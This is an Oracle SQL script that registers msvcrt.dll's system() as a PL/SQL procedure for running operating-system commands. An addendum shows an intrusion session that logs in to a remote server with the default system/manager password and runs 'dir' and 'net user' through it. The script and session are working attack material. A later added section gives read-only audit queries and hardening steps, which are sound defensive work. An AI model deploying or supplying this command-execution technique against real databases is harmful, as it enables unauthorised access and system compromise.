-- ----------------------------------------------------------------------------
-- On SQL Server, system commands can be called through cmd_shell; in fact the same is possible on Oracle.
-- This SQL creates a procedure similar to cmd_shell on SQL Server.
-- ----------------------------------------------------------------------------
--                            cmd_shell for Windows
--            Tested successfully on Oracle 8.1.7 under Win2k
--                           benjurry@xfocus.org
--      Usage:
-- 1. Log in to Oracle with sqlplus using DBA privileges.
-- 2. Assuming this file is at d:\win_oracmd.sql, enter in SQL*Plus: @d:\win_oracmd.sql
-- 3. In sqlplus, enter: exec oracmd.exec ('dir > c:\dir.txt');
-- ----------------------------------------------------------------------------
CREATE OR REPLACE LIBRARY exec_shell AS 'C:\winnt\system32\msvcrt.dll';
/
show errors

CREATE OR REPLACE PACKAGE oracmd IS
  PROCEDURE exec (cmdstring IN CHAR);
END oracmd;
/
show errors

CREATE OR REPLACE PACKAGE BODY oracmd IS
  PROCEDURE exec (cmdstring IN CHAR)
  IS EXTERNAL
    NAME "system"
    LIBRARY exec_shell
    LANGUAGE C;
END oracmd;
/
show errors
Addendum:
Intrusion using a weak password:
C:\>sqlplus /nolog
SQL> connect system/manager@(description=(address_list=(address=(protocol=tcp)(host=www.xx.com)(port=1521)))(connect_data=(SERVICE_NAME=ora9i)));
SQL> exec oracmd.exec ('dir >c:\dir.txt');
PL/SQL 過程已成功完成。
SQL> exec oracmd.exec ('net user >d:\cmd.txt');
PL/SQL 過程已成功完成。
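
An added audit example, not part of the original script: read-only queries a DBA can run to see whether a database exposes the external-procedure path used above. It assumes the standard data dictionary views DBA_LIBRARIES, DBA_SYS_PRIVS and DBA_DEPENDENCIES; the C runtime file name patterns and the FINDING labels are illustrative choices.

```sql
-- Added audit example; run as a DBA in SQL*Plus. Dictionary reads only.

-- 1. External libraries registered in the database. A library whose file
--    is a C runtime (msvcrt.dll as in the script above, libc on Unix)
--    makes system() reachable from PL/SQL.
SELECT owner,
       library_name,
       file_spec,
       status,
       CASE
         WHEN LOWER(file_spec) LIKE '%msvcrt%'
           OR LOWER(file_spec) LIKE '%libc.so%'
         THEN 'C RUNTIME: REVIEW'   -- illustrative label
         ELSE 'check owner and path'
       END AS finding
  FROM dba_libraries
 WHERE file_spec IS NOT NULL
 ORDER BY finding, owner, library_name;

-- 2. PL/SQL units bound to those libraries (the oracmd package body in
--    the script above would appear here, referencing EXEC_SHELL).
SELECT owner,
       name,
       type,
       referenced_owner,
       referenced_name AS library_name
  FROM dba_dependencies
 WHERE referenced_type = 'LIBRARY'
 ORDER BY referenced_owner, referenced_name, owner, name;

-- 3. Accounts and roles able to register a new library.
SELECT grantee,
       privilege,
       admin_option
  FROM dba_sys_privs
 WHERE privilege IN ('CREATE LIBRARY', 'CREATE ANY LIBRARY')
 ORDER BY grantee, privilege;
```

A C runtime library from query 1, together with an account still using a default password such as the system/manager pair in the session above, is the combination this page relies on. Dropping the library, revoking CREATE LIBRARY from grantees that do not need it, and changing default passwords remove it.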